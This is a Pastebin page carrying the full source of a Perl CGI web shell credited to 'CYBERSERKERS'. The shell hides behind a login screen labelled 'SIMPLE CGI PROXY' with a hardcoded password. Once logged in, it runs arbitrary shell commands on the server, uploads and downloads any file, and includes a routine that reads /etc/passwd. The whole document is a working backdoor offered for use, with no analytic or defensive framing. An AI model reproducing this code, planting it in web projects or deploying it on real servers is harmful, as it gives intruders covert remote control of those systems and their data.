API tools faq
paste
Advertisement
CYBERSERKERS

CGI Simple Web5hell

CYBERSERKERS
Jan 22nd, 2016
127
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 12.18 KB | None | 0 0
raw download clone embed print report
  1. #!/usr/bin/perl -I/usr/local/bandmin
  2. $NTCmdSep = "&";
  3. $UnixCmdSep = ";";
  4. $CommandTimeoutDuration = 300;
  5. $ShowDynamicOutput = 1;
  6. $azzatssins = "az404";
  7. $CmdSep = ($WinNT ? $NTCmdSep : $UnixCmdSep);
  8. $CmdPwd = ($WinNT ? "cd" : "pwd");
  9. $PathSep = ($WinNT ? "\\" : "/");
  10. $Redirector = ($WinNT ? " 2>&1 1>&2" : " 1>&1 2>&1");
  11. sub ReadParse
  12. {
  13. local (*in) = @_ if @_;
  14. local ($i, $loc, $key, $val);
  15.  
  16. $MultipartFormData = $ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/;
  17.  
  18. if($ENV{'REQUEST_METHOD'} eq "GET")
  19. {
  20. $in = $ENV{'QUERY_STRING'};
  21. }
  22. elsif($ENV{'REQUEST_METHOD'} eq "POST")
  23. {
  24. binmode(STDIN) if $MultipartFormData & $WinNT;
  25. read(STDIN, $in, $ENV{'CONTENT_LENGTH'});
  26. }
  27. if($ENV{'CONTENT_TYPE'} =~ /multipart\/form-data; boundary=(.+)$/)
  28. {
  29. $Boundary = '--'.$1;
  30. @list = split(/$Boundary/, $in);
  31. $HeaderBody = $list[1];
  32. $HeaderBody =~ /\r\n\r\n|\n\n/;
  33. $Header = $`;
  34. $Body = $';
  35. $Body =~ s/\r\n$//;
  36. $in{'filedata'} = $Body;
  37. $Header =~ /filename=\"(.+)\"/;
  38. $in{'f'} = $1;
  39. $in{'f'} =~ s/\"//g;
  40. $in{'f'} =~ s/\s//g;
  41.  
  42. # parse trailer
  43. for($i=2; $list[$i]; $i++)
  44. {
  45. $list[$i] =~ s/^.+name=$//;
  46. $list[$i] =~ /\"(\w+)\"/;
  47. $key = $1;
  48. $val = $';
  49. $val =~ s/(^(\r\n\r\n|\n\n))|(\r\n$|\n$)//g;
  50. $val =~ s/%(..)/pack("c", hex($1))/ge;
  51. $in{$key} = $val;
  52. }
  53. }
  54. else # standard post data (url encoded, not multipart)
  55. {
  56. @in = split(/&/, $in);
  57. foreach $i (0 .. $#in)
  58. {
  59. $in[$i] =~ s/\+/ /g;
  60. ($key, $val) = split(/=/, $in[$i], 2);
  61. $key =~ s/%(..)/pack("c", hex($1))/ge;
  62. $val =~ s/%(..)/pack("c", hex($1))/ge;
  63. $in{$key} .= "\0" if (defined($in{$key}));
  64. $in{$key} .= $val;
  65. }
  66. }
  67. }
  68.  
  69. sub foo
  70. {
  71. my ( $login, $p, $uid, $gid, $gecos, $dir, $s );
  72.  
  73. my %HoH = ();
  74.  
  75. my $file = '/etc/passwd';
  76. open( PASSWD, "< $file" ) or die "Can't open $file : $!";
  77.  
  78. while( <PASSWD> ) {
  79. ( $login, $p, $uid, $gid, $gecos, $dir, $s ) = split( ':' );
  80.  
  81. $HoH{ $login }{ 'uid' } = $uid;
  82. $HoH{ $login }{ 'gid' } = $gid;
  83. $HoH{ $login }{ 'dir' } = $dir;
  84. }
  85.  
  86. close PASSWD;
  87.  
  88. return \%HoH;
  89. }
  90. sub PrintPageHeader
  91. {
  92. $EncodedCurrentDir = $CurrentDir;
  93. $EncodedCurrentDir =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  94. print "Content-type: text/html\n\n";
  95. print <<END;
  96. <html>
  97. <head>
  98. <meta content=PERLSHELL-BY-AZZATSSINS-CYBERSERKERS-OF-PSYCHOPATH name=description>
  99. <title>.: AZZATSSINS :.</title>
  100. $HtmlMetaHeader
  101. </head>
  102. <body style='color: #000000;background:url(http://azzat.wap.mu/files/1049320/IMG_20150725_103425.JPG) repeat scroll center top;background-attachment: fixed;SCROLLBAR-FACE-COLOR: #000000; MARGIN: 0px;SCROLLBAR-HIGHLIGHT-COLOR: #000000; OVERFLOW: auto;'>
  103. END
  104. }
  105.  
  106. sub PrintLoginScreen
  107. {
  108. $Message = q$
  109. $;
  110. #'
  111. print <<END;
  112. $Message
  113. END
  114. }
  115. sub PrintLoginFailedMessage
  116. {
  117. print <<END;
  118. <code>
  119. <center><br>WHAT THE HELL ARE YOU DOING...!!!<br>
  120. </center>
  121. </code>
  122. END
  123. }
  124.  
  125. sub PrintLoginForm
  126. {
  127. print <<END;
  128. <code>
  129. <br><b><i><font color=red><h1>.: SIMPLE CGI PROXY :.</h1></font><br><font color=lime>INPUT URL....</font></i></b><br>
  130. <form name="f" method="POST" action="$ScriptLocation">
  131. <input type="hidden" name="a" value="login"><center><input type="password" name="p" value="http://azzatssinz.tumblr.com">
  132. <input type="submit" value="GO!!">
  133. </center>
  134. </form>
  135. </code>
  136. END
  137. }
  138. sub PrintPageFooter
  139. {
  140. print "</font></body></html>";
  141. }
  142.  
  143. sub GetCookies
  144. {
  145. @httpcookies = split(/; /,$ENV{'HTTP_COOKIE'});
  146. foreach $cookie(@httpcookies)
  147. {
  148. ($id, $val) = split(/=/, $cookie);
  149. $Cookies{$id} = $val;
  150. }
  151. }
  152.  
  153. sub PrintLogoutScreen
  154. {
  155. print "<code><center><a href=http://azzatssinz.tumblr.com>LogOut Success...</a></center><br><br></code>";
  156. }
  157.  
  158. sub PerformLogout
  159. {
  160. print "Set-Cookie: SAVEDPWD=;\n"; # remove password cookie
  161. &PrintPageHeader("p");
  162. &PrintLogoutScreen;
  163. &PrintLoginScreen;
  164. &PrintLoginForm;
  165. &PrintPageFooter;
  166. }
  167.  
  168. sub PerformLogin
  169. {
  170. if($LoginPassword eq $azzatssins) # password matched
  171. {
  172. print "Set-Cookie: SAVEDPWD=$LoginPassword;\n";
  173. &PrintPageHeader("c");
  174. &PrintCommandLineInputForm;
  175. &PrintPageFooter;
  176. }
  177. else # password didn't match
  178. {
  179. &PrintPageHeader("p");
  180. &PrintLoginScreen;
  181. if($LoginPassword ne "") # some password was entered
  182. {
  183. &PrintLoginFailedMessage;
  184. }
  185. &PrintLoginForm;
  186. &PrintPageFooter;
  187. }
  188. }
  189.  
  190. sub PrintCommandLineInputForm
  191. {
  192. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  193. print <<END;
  194. <code>
  195. <center><a href="$ScriptLocation?a=upload&d=$EncodedCurrentDir"><img src=http://azzat.wap.mu/files/1049320/az-bn-idb.png width=100px height=90></a><br><font color=silver>=====================</font><br><br><form name="f" method="POST" action="$ScriptLocation">
  196. <input type="hidden" name="a" value="command">
  197. <input type="hidden" name="d" value="$CurrentDir">
  198. <b><i><font color="red">$Prompt</font>
  199. </i></b><br>
  200. <input type="text" name="c" size="25">
  201. <input type="submit" value="Enter">
  202. </form>
  203. </center>
  204. </code>
  205.  
  206. END
  207. }
  208.  
  209. sub PrintFileDownloadForm
  210. {
  211. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  212. print <<END;
  213. <code>
  214. <center><font color=lime><b><i><form name="f" method="POST" action="$ScriptLocation">
  215. <input type="hidden" name="d" value="$CurrentDir">
  216. <input type="hidden" name="a" value="download">
  217. $Prompt download<br><br>
  218. Filename: <input type="text" name="f" size="35"><br><br>
  219. Download: <input type="submit" value="Begin">
  220. </form>
  221. </i></b></font></center>
  222. </code>
  223. END
  224. }
  225.  
  226. sub PrintFileUploadForm
  227. {
  228. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  229. print <<END;
  230. <code>
  231. <center><font color="lime"><b><i>[<a href="$ScriptLocation?">Home</a>] [<a href="$ScriptLocation?a=download&d=$EncodedCurrentDir">Download File</a>] [<a href="$ScriptLocation?a=logout">Logout</a>
  232. ]</i></b></font><br><font color=lime><b><i><form name="f" enctype="multipart/form-data" method="POST" action="$ScriptLocation">
  233. $Prompt upload<br><br>
  234. Filename: <input type="file" name="f" size="35"><br><br>
  235. Options: <input type="checkbox" name="o" value="overwrite">
  236. Overwrite if it Exists<br><br>
  237. Upload: <input type="submit" value="Begin">
  238. <input type="hidden" name="d" value="$CurrentDir">
  239. <input type="hidden" name="a" value="upload">
  240. </form></i></b></font>
  241. </center>
  242. </code>
  243. END
  244. }
  245.  
  246. sub CommandTimeout
  247. {
  248. if(!$WinNT)
  249. {
  250. alarm(0);
  251. print <<END;
  252. </xmp>
  253. <code>
  254. Command exceeded maximum time of $CommandTimeoutDuration second(s).
  255. <br>Killed it!
  256. <code>
  257. END
  258. &PrintCommandLineInputForm;
  259. &PrintPageFooter;
  260. exit;
  261. }
  262. }
  263. sub ExecuteCommand
  264. {
  265. if($RunCommand =~ m/^\s*cd\s+(.+)/) # it is a change dir command
  266. {
  267.  
  268. $OldDir = $CurrentDir;
  269. $Command = "cd \"$CurrentDir\"".$CmdSep."cd $1".$CmdSep.$CmdPwd;
  270. chop($CurrentDir = `$Command`);
  271. &PrintPageHeader("c");
  272. &PrintCommandLineInputForm;
  273. print "<div style='float: center; text-align: left;'>";
  274. $Prompt = $WinNT ? "$OldDir> " : "[admin\@$ServerName $OldDir]\ ";
  275. print "<code><center><font color=violet><b><i>$Prompt <br> $RunCommand</i></b></font></center></code>";
  276. }
  277. else # some other command, display the output
  278. {
  279. &PrintPageHeader("c");
  280. &PrintCommandLineInputForm;
  281. print "<div style='float: center; text-align: left;'>";
  282. $Prompt = $WinNT ? "$CurrentDir> " : "[admin\@$ServerName $CurrentDir]\ ";
  283. print "<code><center><font color=violet><b><i>$Prompt <br> $RunCommand<br></i></b></font></center></code><xmp style='color: #00FF00;'>";
  284. $Command = "cd \"$CurrentDir\"".$CmdSep.$RunCommand.$Redirector;
  285. if(!$WinNT)
  286. {
  287. $SIG{'ALRM'} = \&CommandTimeout;
  288. alarm($CommandTimeoutDuration);
  289. }
  290. if($ShowDynamicOutput) # show output as it is generated
  291. {
  292. $|=1;
  293. $Command .= " |";
  294. open(CommandOutput, $Command);
  295. while(<CommandOutput>)
  296. {
  297. $_ =~ s/(\n|\r\n)$//;
  298. print "$_\n";
  299. }
  300. $|=0;
  301. }
  302. else # show output after command completes
  303. {
  304. print "<code><center><b><i><font color=orange> `$Command` </font></i></b></center></code>";
  305. }
  306. if(!$WinNT)
  307. {
  308. alarm(0);
  309. }
  310. print "</xmp>";
  311. }
  312. print "</div>";
  313. &PrintPageFooter;
  314. }
  315.  
  316. sub PrintDownloadLinkPage
  317. {
  318. local($FileUrl) = @_;
  319. if(-e $FileUrl) # if the file exists
  320. {
  321. # encode the file link so we can send it to the browser
  322. $FileUrl =~ s/([^a-zA-Z0-9])/'%'.unpack("H*",$1)/eg;
  323. $DownloadLink = "$ScriptLocation?a=download&f=$FileUrl&o=go";
  324. $HtmlMetaHeader = "<meta HTTP-EQUIV=\"Refresh\" CONTENT=\"1; URL=$DownloadLink\">";
  325. &PrintPageHeader("c");
  326. print <<END;
  327. <code>
  328. Sending File $TransferFile...<br>
  329. If the download does not start automatically,
  330. <a href="$DownloadLink">Click Here</a>.
  331. </code>
  332. END
  333. &PrintCommandLineInputForm;
  334. &PrintPageFooter;
  335. }
  336. else # file doesn't exist
  337. {
  338. &PrintPageHeader("f");
  339. print "<code>Failed to download $FileUrl: $!</code>";
  340. &PrintFileDownloadForm;
  341. &PrintPageFooter;
  342. }
  343. }
  344.  
  345. sub SendFileToBrowser
  346. {
  347. local($SendFile) = @_;
  348. if(open(SENDFILE, $SendFile)) # file opened for reading
  349. {
  350. if($WinNT)
  351. {
  352. binmode(SENDFILE);
  353. binmode(STDOUT);
  354. }
  355. $FileSize = (stat($SendFile))[7];
  356. ($Filename = $SendFile) =~ m!([^/^\\]*)$!;
  357. print "Content-Type: application/x-unknown\n";
  358. print "Content-Length: $FileSize\n";
  359. print "Content-Disposition: attachment; filename=$1\n\n";
  360. print while(<SENDFILE>);
  361. close(SENDFILE);
  362. }
  363. else # failed to open file
  364. {
  365. &PrintPageHeader("f");
  366. print "<code>Failed to download $SendFile: $!</code>";
  367. &PrintFileDownloadForm;
  368. &PrintPageFooter;
  369. }
  370. }
  371.  
  372.  
  373. sub BeginDownload
  374. {
  375. # get fully qualified path of the file to be downloaded
  376. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  377. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  378. {
  379. $TargetFile = $TransferFile;
  380. }
  381. else # path is relative
  382. {
  383. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  384. $TargetFile .= $PathSep.$TransferFile;
  385. }
  386.  
  387. if($Options eq "go") # we have to send the file
  388. {
  389. &SendFileToBrowser($TargetFile);
  390. }
  391. else # we have to send only the link page
  392. {
  393. &PrintDownloadLinkPage($TargetFile);
  394. }
  395. }
  396.  
  397. sub UploadFile
  398. {
  399. # if no file is specified, print the upload form again
  400. if($TransferFile eq "")
  401. {
  402. &PrintPageHeader("f");
  403. &PrintFileUploadForm;
  404. &PrintPageFooter;
  405. return;
  406. }
  407. &PrintPageHeader("c");
  408.  
  409. # start the uploading process
  410. print "<code>Uploading $TransferFile to $CurrentDir...<br>";
  411.  
  412. # get the fullly qualified pathname of the file to be created
  413. chop($TargetName) if ($TargetName = $CurrentDir) =~ m/[\\\/]$/;
  414. $TransferFile =~ m!([^/^\\]*)$!;
  415. $TargetName .= $PathSep.$1;
  416.  
  417. $TargetFileSize = length($in{'filedata'});
  418. # if the file exists and we are not supposed to overwrite it
  419. if(-e $TargetName && $Options ne "overwrite")
  420. {
  421. print "Failed: Destination file already exists.<br>";
  422. }
  423. else # file is not present
  424. {
  425. if(open(UPLOADFILE, ">$TargetName"))
  426. {
  427. binmode(UPLOADFILE) if $WinNT;
  428. print UPLOADFILE $in{'filedata'};
  429. close(UPLOADFILE);
  430. print "Transfered $TargetFileSize Bytes.<br>";
  431. print "File Path: $TargetName<br>";
  432. }
  433. else
  434. {
  435. print "Failed: $!<br>";
  436. }
  437. }
  438. print "</code>";
  439. &PrintCommandLineInputForm;
  440. &PrintPageFooter;
  441. }
  442.  
  443. sub DownloadFile
  444. {
  445. # if no file is specified, print the download form again
  446. if($TransferFile eq "")
  447. {
  448. &PrintPageHeader("f");
  449. &PrintFileDownloadForm;
  450. &PrintPageFooter;
  451. return;
  452. }
  453.  
  454. # get fully qualified path of the file to be downloaded
  455. if(($WinNT & ($TransferFile =~ m/^\\|^.:/)) |
  456. (!$WinNT & ($TransferFile =~ m/^\//))) # path is absolute
  457. {
  458. $TargetFile = $TransferFile;
  459. }
  460. else # path is relative
  461. {
  462. chop($TargetFile) if($TargetFile = $CurrentDir) =~ m/[\\\/]$/;
  463. $TargetFile .= $PathSep.$TransferFile;
  464. }
  465.  
  466. if($Options eq "go") # we have to send the file
  467. {
  468. &SendFileToBrowser($TargetFile);
  469. }
  470. else # we have to send only the link page
  471. {
  472. &PrintDownloadLinkPage($TargetFile);
  473. }
  474. }
  475.  
  476. &ReadParse;
  477. &GetCookies;
  478.  
  479. $ScriptLocation = $ENV{'SCRIPT_NAME'};
  480. $ServerName = $ENV{'SERVER_NAME'};
  481. $LoginPassword = $in{'p'};
  482. $RunCommand = $in{'c'};
  483. $TransferFile = $in{'f'};
  484. $Options = $in{'o'};
  485.  
  486. $Action = $in{'a'};
  487. $Action = "login" if($Action eq ""); # no action specified, use default
  488.  
  489. # get the directory in which the commands will be executed
  490. $CurrentDir = $in{'d'};
  491. chop($CurrentDir = `$CmdPwd`) if($CurrentDir eq "");
  492.  
  493. $LoggedIn = $Cookies{'SAVEDPWD'} eq $azzatssins;
  494.  
  495. if($Action eq "login" || !$LoggedIn) # user needs/has to login
  496. {
  497. &PerformLogin;
  498. }
  499. elsif($Action eq "command") # user wants to run a command
  500. {
  501. &ExecuteCommand;
  502. }
  503. elsif($Action eq "upload") # user wants to upload a file
  504. {
  505. &UploadFile;
  506. }
  507. elsif($Action eq "download") # user wants to download a file
  508. {
  509. &DownloadFile;
  510. }
  511. elsif($Action eq "logout") # user wants to logout
  512. {
  513. &PerformLogout;
  514. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!